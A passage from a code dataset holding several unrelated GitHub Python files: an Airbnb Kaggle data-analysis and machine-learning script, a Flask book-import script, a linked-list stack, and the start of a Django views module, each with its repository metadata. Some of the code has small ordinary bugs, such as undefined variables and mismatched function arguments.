Marketing.\n# - Predict the time between creating the account and booking (Outlier)\n\n# # Introduction\n\n# ## Why this project?\n\n# Why interesting? How relevant? \n# This project is real-life applicable. \n\n# ## Data Set \n\n# - train_users.csv - the training set of users \n# - test_users.csv - the test set of users\n# - sessions.csv - web sessions log for users\n# - countries.csv - summary statistics of destination countries in this dataset and their locations \n# - age_gender_bkts.csv - summary statistics of users' age group, gender, country of destination \n# - sample_submission.csv - correct format for submitting your predictions\n\n# We have a list of users along with their demographics, web session records, and some summary statistics, a total of 16 variables. The majority of variables are categorical variables. A total of 213466 users in the training set and 62096 in the test set. \n\n# The training and test sets are split by dates. In the test set, you will predict all the new users with first activities after 7/1/2014 (note: this is updated on 12/5/15 when the competition restarted).\n\n# ## Setups \n\n# In[11]:\n\nimport os\nimport random\nfrom collections import Counter\n\nimport numpy as np\nimport pandas as pd\n\n# Plotting\nget_ipython().magic('matplotlib inline')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Machine Learning\nfrom sklearn.feature_selection import SelectPercentile\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\n# import category_encoders as ce\n\n\n# In[12]:\n\nsns.set_context(\"paper\")\n\n\n# # Data Preparation\n\n# ## Work Flow\n\n# 0. Preprocessing \n# - Formatting\n# - Cleaning \n# 0. Transformation\n# - Scaling\n# - Decomposition (date, time)\n# 0. Feature Selection\n\n# some question I may be insterested in asking:\n# (2, 3 questions are more interesting to answer) \n# \n# 1. predict the first destination of a new user. \n# 2. predict the time between creating the account and booking \n# 3. look into what signup method I want to invest more money in? (What signup method is the most popular or has the highest rate of booking a hotel) \n\n# ## Helper Functions\n\n# In[185]:\n\ndef get_summary(df, all=True):\n get_shape(df)\n print('\\nData Types')\n get_dtypes(df)\n print('\\nNA Values')\n get_NAs(df, all=all)\n\n\n# In[186]:\n\ndef get_shape(df):\n num_obs, num_features = df.shape\n print('There are {} observations with {} features'\n .format(num_obs, num_features))\n\n\n# In[15]:\n\ndef get_dtypes(df):\n _, num_features = df.shape\n dtype_counts = Counter(df.dtypes).most_common()\n print(df.dtypes, '\\n')\n for dtype, counts in dtype_counts:\n print('{}: {} {:.2f}%'\n .format(dtype, counts, counts / num_features * 100))\n\n\n# In[16]:\n\ndef get_NAs(df, all=True):\n num_obs, _ = df.shape\n for feature, num_na in df.isnull().sum().items():\n if all:\n print(\"{}: {} {:.2f}%\"\n .format(feature, num_na, num_na / num_obs * 100))\n if num_na > 0:\n print(\"{}: {} {:.2f}%\"\n .format(feature, num_na, num_na / num_obs * 100))\n\n\n# In[17]:\n\ndef get_categorical(df):\n return [feature for feature, dtype in df.dtypes.items()\n if dtype == 'O']\n\n\n# In[18]:\n\ndef get_numerical(df):\n return [feature for feature, dtype in df.dtypes.items()\n if feature not in get_categorical(df)]\n\n\n# ## Data Cleaning\n\n# Load the data into DataFrames\n\n# In[19]:\n\nget_ipython().magic('ls data')\n\n\n# In[20]:\n\nfiles = [f for f in os.listdir('./data/') if f.endswith('csv')]\nfiles\n\n\n# In[21]:\n\nna_values = ['-unknown-', ' ']\n\n\n# ## Users\n\n# In[22]:\n\nusers_train_file, users_test_file = files[4], files[3]\n\n\n# In[23]:\n\nusers = pd.read_csv('./data/{}'.format(users_train_file),\n na_values=na_values)\n\n\n# In[24]:\n\nusers.sample(10)\n\n\n# In[25]:\n\nget_summary(users)\n\n\n# > 58.35% of the users have never booked. Let's explore why.\n\n# In[26]:\n\nget_numerical(users)\n\n\n# In[27]:\n\nget_categorical(users)\n\n\n# Some of these are not categorical, let's fix that.\n\n# ### Cleaning DateTime\n\n# 0. change data types to datetime\n# 0. created, first booking - extract month\n# 0. time difference in days between created and first booking\n# 0. first active - extract hour of the day\n\n# In[28]:\n\nusers_cols_date = [feature for feature in users.keys()\n if 'date' in feature]\nusers_cols_time = [feature for feature in users.keys()\n if 'time' in feature]\nusers_cols_dt = users_cols_date + users_cols_time\n\n\n# We also record the columns after change\n\n# In[29]:\n\nusers_cols_dt_after = list(users_cols_dt)\n\n\n# In[30]:\n\nusers[users_cols_dt].sample(5)\n\n\n# #### change data types to datetime\n\n# In[31]:\n\nusers[users_cols_date].sample(5)\n\n\n# In[32]:\n\nusers[users_cols_date].dtypes\n\n\n# In[33]:\n\nfor col in users_cols_date:\n users[col] = pd.to_datetime(users[col])\n\n\n# In[34]:\n\nusers[users_cols_date].dtypes\n\n\n# In[35]:\n\nusers[users_cols_time].head(5)\n\n\n# In[36]:\n\nusers[users_cols_time].dtypes\n\n\n# In[37]:\n\nfor col in users_cols_time:\n users[col] = pd.to_datetime(users[col], format=\"%Y%m%d%H%M%S\")\n\n\n# In[38]:\n\nusers[users_cols_time].dtypes\n\n\n# #### created, first booking - extract month\n\n# In[39]:\n\nusers[users_cols_dt].sample(5)\n\n\n# In[40]:\n\nfor col in users_cols_dt:\n users['{}_month'.format(col)] = users[col].apply(lambda dt: dt.month)\n users_cols_dt_after += ['{}_month'.format(col)]\n\n\n# In[41]:\n\nusers_cols_dt_month = [col + '_month' for col in users_cols_dt]\n\n\n# In[42]:\n\nusers[users_cols_dt_month].sample(5)\n\n\n# #### time difference in days between created and first booking\n\n# In[43]:\n\nusers_cols_date\n\n\n# In[44]:\n\nusers['time_delta_bc'] = users[users_cols_date[1]] - users[users_cols_date[0]]\nusers['time_delta_bc'] = (\n users['time_delta_bc'].dropna() / np.timedelta64(1, 'D')).astype(int)\nusers_cols_dt_after += ['time_delta_bc']\n\n\n# In[45]:\n\nusers[['time_delta_bc']].sample(5)\n\n\n# #### first active hour of the day\n\n# In[46]:\n\nusers[users_cols_time].sample(5)\n\n\n# In[47]:\n\nfor col in users_cols_time:\n users['{}_hour'.format(col)] = users[col].apply(lambda dt: dt.hour)\n users_cols_dt_after += ['{}_hour'.format(col)]\n\n\n# In[48]:\n\nusers_cols_time_hour = [col + '_hour' for col in users_cols_time]\n\n\n# In[49]:\n\nusers[users_cols_time_hour].sample(5)\n\n\n# ### Cleaning `age`\n\n# In[50]:\n\nusers['age'].describe()\n\n\n# In[51]:\n\nsns.distplot(users['age'].dropna())\n\n\n# In[52]:\n\nusers.shape\n\n\n# In[53]:\n\nusers = users[users['age'].fillna(0) < 100]\n\n\n# In[54]:\n\nusers.shape\n\n\n# In[55]:\n\nusers[['age']].sample(10)\n\n\n# In[56]:\n\nsns.distplot(users['age'].dropna())\n\n\n# ### Convert Categorical Data\n\n# In[57]:\n\nusers.drop(users_cols_dt_after, axis=1).sample(5)\n\n\n# In[58]:\n\nusers_cols_categorical = get_categorical(users)\nusers_cols_categorical\n\n\n# We don't need id since that's just randomly generated index\n\n# In[59]:\n\nusers_cols_categorical.remove('id')\nusers_cols_categorical\n\n\n# Some of the datetime (hour and month) can also be categorical (ordinal)\n\n# In[60]:\n\nusers_cols_dt_categorical = [col for col in users_cols_dt_after\n if 'month' in col or 'hour' in col]\nusers_cols_dt_categorical\n\n\n# In[61]:\n\nusers_cols_categorical += users_cols_dt_categorical\n\n\n# In[62]:\n\nusers_cols_categorical\n\n\n# In[63]:\n\nfor col in users_cols_categorical:\n users[col] = users[col].astype('category')\n\n\n# In[64]:\n\nget_dtypes(users)\n\n\n# ### Fill NAs\n\n# In[65]:\n\nget_NAs(users, all=False)\n\n\n# We will try out different methods for dealing with NAs\n\n# #### drop all NAs\n\n# Conditions:\n# 1. Have sufficient data points, so the model doesn't lose power.\n# 2. Not to introduce bias (meaning, disproportionate or non-representation of classes).\n\n# In[66]:\n\nusers_dropna = users.dropna().reset_index(drop=True)\n\n\n# In[67]:\n\nget_summary(users_dropna, all=False)\n\n\n# In[68]:\n\nusers['gender'].value_counts().plot(kind='bar')\n\n\n# In[69]:\n\nusers_dropna['gender'].value_counts().plot(kind='bar')\n\n\n# In[70]:\n\nsns.distplot(users['age'].dropna())\n\n\n# In[71]:\n\nsns.distplot(users_dropna['age'])\n\n\n# # Machine Learning\n\n# ## Helper Functions\n\n# In[187]:\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_selection import RFE\n\n\n# In[188]:\n\ndef encode_features(features, cols):\n \"\"\"Encode all nominal features to oridinal\"\"\"\n features_encoded = features.copy(deep=True)\n feature_encoding_map = {col: LabelEncoder() for col in cols}\n\n for col in cols:\n features_encoded[col] = feature_encoding_map[col].fit_transform(\n features_encoded[col])\n\n return features_encoded, feature_encoding_map\n\n\n# In[189]:\n\ndef eval_on_data(features, target, model, seed=523):\n X_train, X_test, y_train, y_test = train_test_split(features,\n target,\n random_state=seed,\n test_size=.15)\n model.fit(X_train, y_train)\n print(\"Train Score with all features: {:.3f}%\"\n .format(model.score(X_train, y_train) * 100))\n print(\"Test Score with all features: {:.3f}%\"\n .format(model.score(X_test, y_test) * 100))\n\n\n# Select feature by best K features univariate regressions\n\n# In[190]:\n\ndef select_features(features, target, clf, selector=SelectKBest, verbose=False, max_k=None):\n X_train, X_test, y_train, y_test = train_test_split(features,\n target,\n random_state=523,\n test_size=.15)\n num_features = X_train.shape[1]\n max_k = max_k if max_k else num_features\n K = [i for i in range(1, max_k + 1)]\n scores_train, scores_test = [], []\n for k in K:\n select = selector(k=k)\n select.fit(X_train, y_train)\n X_train_selected = select.transform(X_train)\n X_test_selected = select.transform(X_test)\n\n # Fit Classifier with training data\n clf.fit(X_train_selected, y_train)\n print(\"k={}\".format(k))\n\n # Show training score\n score_train = clf.score(X_train_selected, y_train)\n scores_train += [score_train]\n print(\"Train Score with all features: {:.3f}%\"\n .format(score_train * 100))\n\n # Show test score\n score_test = clf.score(X_test_selected, y_test)\n scores_test += [score_test]\n print(\"Test Score with all features: {:.3f}%\"\n .format(score_test * 100))\n\n # Show selected features\n mask = select.get_support()\n if verbose:\n # visualize the mask -- black is True, white is False\n plt.matshow(mask.reshape(1, -1), cmap='gray_r')\n plt.xlabel('best {} features'.format(k))\n print([c for c, s in zip(features.columns, mask) if s])\n print('\\n')\n plt.plot(K, scores_train, label='training score')\n plt.plot(K, scores_test, label='test score')\n plt.legend()\n return K, scores_train, scores_test\n\n\n# In[191]:\n\ndef select_features_perc(features, target, clf, max_perc=50, inc=5, verbose=False):\n X_train, X_test, y_train, y_test = train_test_split(features,\n target,\n random_state=523,\n test_size=.15)\n\n percs = list(range(1, max_perc + 1, inc))\n scores_train, scores_test = [], []\n for perc in percs:\n select = SelectPercentile(percentile=perc)\n select.fit(X_train, y_train)\n X_train_selected = select.transform(X_train)\n X_test_selected = select.transform(X_test)\n\n # Fit Classifier with training data\n clf.fit(X_train_selected, y_train)\n print(\"k={}\".format(k))\n\n # Show training score\n score_train = clf.score(X_train_selected, y_train)\n scores_train += [score_train]\n print(\"Train Score with all features: {:.3f}%\"\n .format(score_train * 100))\n\n # Show test score\n score_test = clf.score(X_test_selected, y_test)\n scores_test += [score_test]\n print(\"Test Score with all features: {:.3f}%\"\n .format(score_test * 100))\n\n # Show selected features\n mask = select.get_support()\n if verbose:\n # visualize the mask -- black is True, white is False\n plt.matshow(mask.reshape(1, -1), cmap='gray_r')\n plt.xlabel('best {} features'.format(perc))\n print([c for c, s in zip(features.columns, mask) if s])\n print('\\n')\n plt.plot(percs, scores_train, label='training score')\n plt.plot(percs, scores_test, label='test score')\n plt.legend()\n return percs, scores_train, scores_test\n\n\n# In[192]:\n\ndef select_features_model(features, target, clf, threshold='median', verbose=False):\n X_train, X_test, y_train, y_test = train_test_split(features,\n target,\n random_state=523,\n test_size=.15)\n select = SelectFromModel(\n RandomForestClassifier(n_estimators=100, random_state=523),threshold=threshold)\n select.fit(X_train, y_train)\n X_train_selected = select.transform(X_train)\n X_test_selected = select.transform(X_test)\n\n # Fit Classifier with training data\n clf.fit(X_train_selected, y_train)\n\n # Show training score\n score_train = clf.score(X_train_selected, y_train)\n print(\"Train Score with all features: {:.3f}%\"\n .format(score_train * 100))\n\n # Show test score\n score_test = clf.score(X_test_selected, y_test)\n print(\"Test Score with all features: {:.3f}%\"\n .format(score_test * 100))\n\n # Show selected features\n mask = select.get_support()\n if verbose:\n # visualize the mask -- black is True, white is False\n plt.matshow(mask.reshape(1, -1), cmap='gray_r')\n plt.xlabel('best {} features'.format(perc))\n print([c for c, s in zip(features.columns, mask) if s])\n print('\\n')\n return select\n\n\n# In[193]:\n\ndef select_features_RFE(features, target, clf, numX = 3,verbose=False):\n X_train, X_test, y_train, y_test = train_test_split(features,\n target,\n random_state=523,\n test_size=.15)\n select = RFE(\n RandomForestClassifier(n_estimators=100, random_state=523),\n n_features_to_select=numX)\n select.fit(X_train, y_train)\n X_train_selected = select.transform(X_train)\n X_test_selected = select.transform(X_test)\n\n # Fit Classifier with training data\n clf.fit(X_train_selected, y_train)\n\n # Show training score\n score_train = clf.score(X_train_selected, y_train)\n print(\"Train Score with all features: {:.3f}%\"\n .format(score_train * 100))\n\n # Show test score\n score_test = clf.score(X_test_selected, y_test)\n print(\"Test Score with all features: {:.3f}%\"\n .format(score_test * 100))\n\n # Show selected features\n mask = select.get_support()\n if verbose:\n # visualize the mask -- black is True, white is False\n plt.matshow(mask.reshape(1, -1), cmap='gray_r')\n plt.xlabel('best {} features'.format(perc))\n print([c for c, s in zip(features.columns, mask) if s])\n print('\\n')\n return select\n\n\n# In[79]:\n\ndef eval_selected_feature(features, target, clf, k):\n X_train, X_test, y_train, y_test = train_test_split(features,\n target,\n random_state=523,\n test_size=.15)\n select = SelectKBest(k=k)\n select.fit(X_train, y_train)\n X_train_selected = select.transform(X_train)\n X_test_selected = select.transform(X_test)\n\n # Fit Classifier with training data\n clf.fit(X_train_selected, y_train)\n print(\"k={}\".format(k))\n\n # Show training score\n score_train = clf.score(X_train_selected, y_train)\n print(\"Train Score with all features: {:.3f}%\"\n .format(score_train * 100))\n\n # Show test score\n score_test = clf.score(X_test_selected, y_test)\n print(\"Test Score with all features: {:.3f}%\"\n .format(score_test * 100))\n\n # Show selected features\n mask = select.get_support()\n\n # visualize the mask -- black is True, white is False\n plt.matshow(mask.reshape(1, -1), cmap='gray_r')\n plt.xlabel('best {} features'.format(k))\n selected_features = [c for c, s in zip(features.columns, mask) if s]\n print(selected_features)\n print('\\n')\n return score_train, score_test, selected_features\n\n\n# In[80]:\n\ndef print_result(train_R2, test_R2, support_vector):\n print('Final train R2: {:.4f}'.format(train_R2))\n print('Final test R2: {:.4f}'.format(test_R2))\n print('Final select_features:')\n for feature in support_vector:\n print(feature)\n\n\n# ## Preprocessing\n\n# ### Drop Useless Features\n\n# In[81]:\n\nusers_dropna.sample(5)\n\n\n# In[82]:\n\ncols = list(users.columns)\ncols\n\n\n# In[83]:\n\ncols_to_drop = ['id', 'date_account_created',\n 'timestamp_first_active', 'date_first_booking']\n\n\n# In[84]:\n\nusers_dropna = users_dropna.drop(cols_to_drop, axis=1)\n\n\n# In[85]:\n\nusers_dropna.sample(5)\n\n\n# ## Supervised Learning (Regression)\n\n# Predict the time between creating the account and booking\n\n# In[86]:\n\nfrom sklearn.svm import SVR\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.linear_model import Lasso\nfrom sklearn.tree import DecisionTreeRegressor\n\n\n# - Linear Regression\n# - Ridge Regression\n# - Lasso Regression\n# - Decision Tree Regressor\n# - Support Vector Machine Regressor\n\n# ### features, target split\n\n# In[74]:\n\nusers_dropna.sample(5)\n\n\n# In[91]:\n\ntarget_name_rgs = ['time_delta_bc']\n\n\n# In[92]:\n\ncols_to_drop_rgs = target_name_rgs + ['date_first_booking_month']\n\n\n# In[93]:\n\nfeatures_rgs, target_rgs = users_dropna.drop(\n cols_to_drop_rgs, axis=1), users_dropna[target_name_rgs]\n\n\n# In[94]:\n\nfeatures_rgs.sample(5)\n\n\n# In[95]:\n\ntarget_rgs.sample(5)\n\n\n# ### Encoding Categorical Data\n\n# In[96]:\n\nfeatures_rgs.dtypes\n\n\n# In[97]:\n\nfeatures_num_rgs = ['age', 'signup_flow']\nfeatures_num_rgs\n\n\n# In[98]:\n\nfeatures_cat_rgs = list(features_rgs.columns.difference(features_num_rgs))\nfeatures_cat_rgs\n\n\n# In[153]:\n\nfeatures_rgs, fe_cat_map_rgs = encode_features(features_rgs, features_cat_rgs)\n\n\n# In[154]:\n\nfeatures_rgs.sample(5)\n\n\n# In[155]:\n\nfe_cat_map_rgs\n\n\n# ### Feature Scaling\n\n# In[156]:\n\ndef scale_features(features, cols=None):\n \"\"\"Scale selected features to oridinal\"\"\"\n features_scaled = features.copy(deep=True)\n\n cols = cols if cols else list(features.columns)\n\n feature_scaling_map = {col: StandardScaler() for col in cols}\n\n for col in cols:\n features_scaled[col] = feature_scaling_map[col].fit_transform(\n features_scaled[col])\n\n return features_scaled, feature_scaling_map\n\n\n# In[157]:\n\nfeatures_rgs, fs_map_rgr = scale_features(features_rgs)\n\n\n# In[158]:\n\nfeatures_rgs.sample(5)\n\n\n# In[159]:\n\nfs_map_rgr\n\n\n# ### flatten target dimensions\n\n# In[160]:\n\ntarget_rgs.sample(5)\n\n\n# In[161]:\n\ntarget_rgs = np.ravel(target_rgs)\ntarget_rgs\n\n\n# ### Linear Regression\n\n# In[162]:\n\nlin = LinearRegression()\neval_on_data(features_rgs, target_rgs, lin)\n\n\n# ### Lasso\n\n# In[94]:\n\nlasso = Lasso()\neval_on_data(features_rgs, target_rgs, lasso)\n\n\n# In[95]:\n\nfor alpha in [0.2, 0.4, 0.6, 0.8, 1]:\n print('alpha {}'.format(alpha))\n lasso = Lasso(alpha=alpha)\n select_features(features_rgs, target_rgs, lasso)\n\n\n# ### SVM\n\n# In[96]:\n\n# svr = SVR()\n# select_features(features_rgs, target_rgs, svr, max_k=3)\n\n\n# ### Decision Tree\n\n# #### tuning max depth\n\n# In[97]:\n\nmax_test_scores = dict()\nfor max_depth in range(2, 16 + 1):\n print('max depth: {}'.format(max_depth))\n dtr = DecisionTreeRegressor(max_depth=max_depth)\n k, _, scores_test = select_features(features_rgs, target_rgs, dtr)\n max_test_scores[max_depth] = max(\n list(zip(scores_test, k)), key=lambda sk: sk[0])\n\n\n# In[98]:\n\nmax_test_scores\n\n\n# #### tuning max leaf nodes\n\n# In[99]:\n\nmax_test_scores = dict()\nfor min_samples_leaf in range(38, 48, 1):\n print('min samples leaf: {}'.format(min_samples_leaf))\n dtr = DecisionTreeRegressor(\n max_depth=11, min_samples_leaf=min_samples_leaf)\n k, _, scores_test = select_features(features_rgs, target_rgs, dtr)\n max_test_scores[min_samples_leaf] = max(\n list(zip(scores_test, k)), key=lambda sk: sk[0])\n\n\n# In[100]:\n\nmax_test_scores\n\n\n# ## Supervised Learning (Classification) Time Diff \n\n# #### transform the time_delta_bc to a categorical data \n\n# In[183]:\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nimport numpy as np\nimport pandas as pd \n\n\n# In[163]:\n\nusers_dropna['time_delta_bc'].describe()\n\n\n# In[164]:\n\ndef group(c):\n if c['time_delta_bc'] < 1:\n return '0'\n elif 1 <= c['time_delta_bc'] < 4:\n return '1'\n elif 4 <= c['time_delta_bc'] < 46:\n return '2'\n else:\n return '3'\n\n\n# In[165]:\n\nusers_dropna['time_delta_c'] = users_dropna.apply(group, axis=1)\n\n\n# In[166]:\n\nusers_dropna.dtypes\n\n\n# In[167]:\n\n# convert it to categorical variable \nusers_dropna['time_delta_c'] = users_dropna['time_delta_c'].astype('category')\n\n\n# ### prepare\n\n# In[168]:\n\ntarget_name_clf = ['time_delta_c'] \n\n\n# In[169]:\n\n# drop the useless cols \ncols_to_drop_clf = ['time_delta_bc',\n 'date_first_booking_month',\n 'country_destination'] + target_name_clf\ncols_to_drop_clf\n\n\n# In[170]:\n\nfeatures_clf, target_clf = users_dropna.drop(\n cols_to_drop_clf, axis=1), users_dropna[target_name_clf]\n\n\n# In[171]:\n\n# numeric variables \nfeatures_num_clf = ['age', 'signup_flow']\nfeatures_num_clf\n\n\n# In[172]:\n\n# what categorical variables I used \nfeatures_cat_clf = list(features_clf.columns.difference(features_num_clf))\nfeatures_cat_clf\n\n\n# In[173]:\n\nfeatures_clf, fe_cat_map_clf = encode_features(features_clf, features_cat_clf)\n\n\n# In[174]:\n\n# convert targers \ntarget_clf, te_cat_map_clf = encode_features(target_clf, target_name_clf)\n\n\n# In[175]:\n\nte_cat_map_clf\n\n\n# In[176]:\n\ntarget_clf = np.ravel(target_clf)\ntarget_clf\n\n\n# In[177]:\n\n# feature scaling \nfeatures_clf, fs_map_clf = scale_features(features_clf)\n\n\n# In[178]:\n\nfeatures_clf.sample(5)\n\n\n# In[179]:\n\nfs_map_clf\n\n\n# ### Decision Trees \n\n# In[180]:\n\ndtc = DecisionTreeClassifier(random_state=523)\nselect_features(features_clf, target_clf, dtc)\n\n\n# In[196]:\n\nselect_features_model(features_clf, target_clf, dtc, selector=RFE)\n\n\n# In[197]:\n\nselect_features_model(features_clf, target_clf, dtc, selector=RFE, numX=2)\n\n\n# ### Logistic Regression \n\n# In[198]:\n\nlrc = LogisticRegression(random_state=523)\nselect_features(features_clf, target_clf, lrc)\n\n\n# ### SVM\n\n# In[199]:\n\nsvc = SVC()\nselect_features(features_clf, target_clf, svc, max_k=3)\n\n\n# ### Random Forest \n\n# In[200]:\n\nrfc = RandomForestClassifier()\nselect_features(features_clf, target_clf, rfc)\n\n\n# ### Boosting \n\n# In[201]:\n\nadbc = AdaBoostClassifier(DecisionTreeClassifier())\nselect_features(features_clf, target_clf, adbc)\n\n\n# ## Supervised Learning (Classification)\n\n# Predict which country a new user's first booking destination will be. \n\n# - Decision Tree\n# - Logistic regression \n# - SVM \n# - Ensemble\n# - Boosting\n# - Random Forest\n\n# In[102]:\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n# ### features, target split\n\n# We need to get rid of anything related to first booking. Since we would know the country destination had we known the first booking.\n\n# In[136]:\n\nusers_dropna.sample(5)\n\n\n# In[137]:\n\nusers_dropna.columns\n\n\n# In[138]:\n\ntarget_name_clf = ['country_destination']\n\n\n# In[139]:\n\ncols_to_drop_clf = ['time_delta_bc',\n 'date_first_booking_month'] + target_name_clf\ncols_to_drop_clf\n\n\n# In[140]:\n\nfeatures_clf, target_clf = users_dropna.drop(\n cols_to_drop_clf, axis=1), users_dropna[target_name_clf]\n\n\n# In[141]:\n\nfeatures_clf.sample(5)\n\n\n# In[142]:\n\ntarget_clf.sample(5)\n\n\n# ### Encoding Categorical Data\n\n# #### Convert Features\n\n# In[143]:\n\nfeatures_clf.dtypes\n\n\n# In[144]:\n\nfeatures_num_clf = ['age', 'signup_flow']\nfeatures_num_clf\n\n\n# In[145]:\n\nfeatures_cat_clf = list(features_clf.columns.difference(features_num_clf))\nfeatures_cat_clf\n\n\n# In[146]:\n\nfeatures_clf, fe_cat_map_clf = encode_features(features_clf, features_cat_clf)\n\n\n# In[148]:\n\nfeatures_clf.sample(5)\n\n\n# In[147]:\n\nfe_cat_map_clf\n\n\n# #### Convert Targets\n\n# In[149]:\n\ntarget_clf, te_cat_map_clf = encode_features(target_clf, target_name_clf)\n\n\n# In[150]:\n\ntarget_clf.sample(5)\n\n\n# In[151]:\n\nte_cat_map_clf\n\n\n# In[153]:\n\ntarget_clf = np.ravel(target_clf)\ntarget_clf\n\n\n# ### Feature Scaling\n\n# In[155]:\n\nfeatures_clf.sample(5)\n\n\n# In[152]:\n\nfeatures_clf, fs_map_clf = scale_features(features_clf)\n\n\n# In[157]:\n\nfeatures_clf.sample(5)\n\n\n# for classification\n\n# In[158]:\n\nfs_map_clf\n\n\n# ### Decision Trees\n\n# In[ ]:\n\ndtc = DecisionTreeClassifier(random_state=523)\nselect_features(features_clf, target_clf, dtc)\n\n\n# In[175]:\n\nselect_features_perc(features_clf, target_clf, dtc, max_perc=35, inc=5)\n\n\n# In[194]:\n\nselect_features_model(features_clf, target_clf, dtc, selector=RFE)\n\n\n# In[193]:\n\nselect_features_model(features_clf, target_clf, dtc, selector=RFE, numX=2)\n\n\n# In[192]:\n\nselect_features_model(features_clf, target_clf, dtc, selector=RFE, numX=4)\n\n\n# ### Logistic Regression\n\n# In[160]:\n\nlrc = LogisticRegression(random_state=523)\nselect_features(features_clf, target_clf, lrc)\n\n\n# ### SVM\n\n# In[162]:\n\nsvc = SVC()\nselect_features(features_clf, target_clf, svc, max_k=3)\n\n\n# ### Random Forest\n\n# In[161]:\n\nrfc = RandomForestClassifier()\nselect_features(features_clf, target_clf, rfc)\n\n\n# ### Boosting\n\n# In[163]:\n\nadbc = AdaBoostClassifier(DecisionTreeClassifier())\nselect_features(features_clf, target_clf, adbc)\n\n\n# # Reflection\n\n# ## Conclusion\n\n# ## Issues\n","repo_name":"ccihiocil1/MyProjects","sub_path":"PythonAirbnbKaggle/Airbnb_code.py","file_name":"Airbnb_code.py","file_ext":"py","file_size_in_byte":27226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36172100053","text":"import csv\nimport os\nfrom mybookreview import app\n\n\ndef main():\n f = open(\"books.csv\")\n reader = csv.reader(f)\n header = next(reader)\n\n print(\"Running script ... \")\n for isbn, title, author, year in reader:\n db.execute(\"INSERT INTO books(isbn, title, author, year) VALUES(:i, :t, :a, :y)\", {\"i\": isbn, \"t\": title, \"a\": author, \"y\": year})\n\n db.commit()\n \n print(\"Completed ... \")\n\n\nif __name__ == \"__main__\":\n\n app.run(\n host=os.environ.get(\"IP\"),\n port=int(os.environ.get(\"PORT\")),\n debug=os.environ.get(\"DEBUG\")\n )","repo_name":"struk49/my-book-review-app","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35589096351","text":"# This is to implement Stack using Linked List\nclass node:\n \n data = None\n next = None\n\n def __init__(self):\n self.data = None\n self.next = None\n \n def add_data(self, data):\n self.data = data\n \n def add_next(self, node):\n self.next = node\n\nclass stack:\n\n head = None\n\n def __init__(self):\n self.head = None\n\n def add_head(self, node):\n self.head = node\n \n def push(self, node):\n temp = self.head\n while(temp.next != None):\n temp = temp.next\n temp.next = node\n \n def pop(self):\n temp = self.head\n while(temp.next.next != None):\n temp = temp.next\n temp.next = None\n\n def print_stack(self):\n temp = self.head\n temp_list = []\n while(temp.next != None):\n temp_list.append(temp.data)\n temp = temp.next\n temp_list.append(temp.data)\n print(temp_list)\n\nn1 = node()\nn1.add_data(1)\nn2 = node()\nn2.add_data(2)\nn3 = node()\nn3.add_data(3)\nn4 = node()\nn4.add_data(4)\nn5 = node()\nn5.add_data(5)\ns = stack()\ns.add_head(n1)\ns.push(n2)\ns.push(n3) \ns.push(n4) \ns.push(n5)\ns.print_stack()\ns.pop()\ns.print_stack()\nn6 = node()\nn6.add_data(6)\ns.push(n6)\ns.print_stack() \n","repo_name":"trishantpahwa/Python_Data_Structures","sub_path":"Stack/Stack_Linked_List.py","file_name":"Stack_Linked_List.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39008398322","text":"from django.contrib import messages\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.shortcuts import render, redirect, get_object_or_404\nimport requests\n# Create your views here.\nfrom donate.models import Donate_Post\nfrom home.forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm\nfrom home.models import Profile\n\n\ndef index(request):\n if request.user.is_authenticated:\n prof = Profile.objects.get(user=request.user)\n print(prof.user)\n if (prof.city==None or prof.state==None or prof.pinCode==None):\n print(\"complete profile plis\")\n messages.success(request, f'Please complete your Profile {prof.user} .... by going to profile and filling your address details!')\n return render(request, 'home/homepage.html')\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Account created successfully {username}!')\n return redirect('index')\n else:\n form = UserRegisterForm()\n return render(request, 'home/register.html', {'form': form})\n\n\n@login_required\ndef profile(request):\n posts = Donate_Post.objects.filter(author=request.user).order_by('-created')\n Cposts = Donate_Post.objects.filter(author=request.user).filter(availableitems=\"Clothes\")\n Fposts = Donate_Post.objects.filter(author=request.user).filter(availableitems=\"Food\")\n Tposts = Donate_Post.objects.filter(author=request.user).filter(availableitems=\"Toys\")\n Bposts = Donate_Post.objects.filter(author=request.user).filter(availableitems=\"Books\")\n Oposts = Donate_Post.objects.filter(author=request.user).filter(availableitems=\"Others\")\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user)\n p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request, f'Account updated successfully!')\n return redirect('profile')\n else:\n u_form = UserUpdateForm(instance=request.user)\n p_form = ProfileUpdateForm(instance=request.user.profile)\n context = {\n 'Cposts': Cposts,\n 'u_form': u_form,\n 'p_form': p_form,\n 'posts': posts,\n 'Fposts': Fposts,\n 'Tposts': Tposts,\n 'Bposts': Bposts,\n 'Oposts': Oposts\n }\n return render(request, 'home/profile.html', context)\n\n\ndef rewards(request):\n post = get_object_or_404(Profile, user=request.user)\n if post.coupons_achieved == 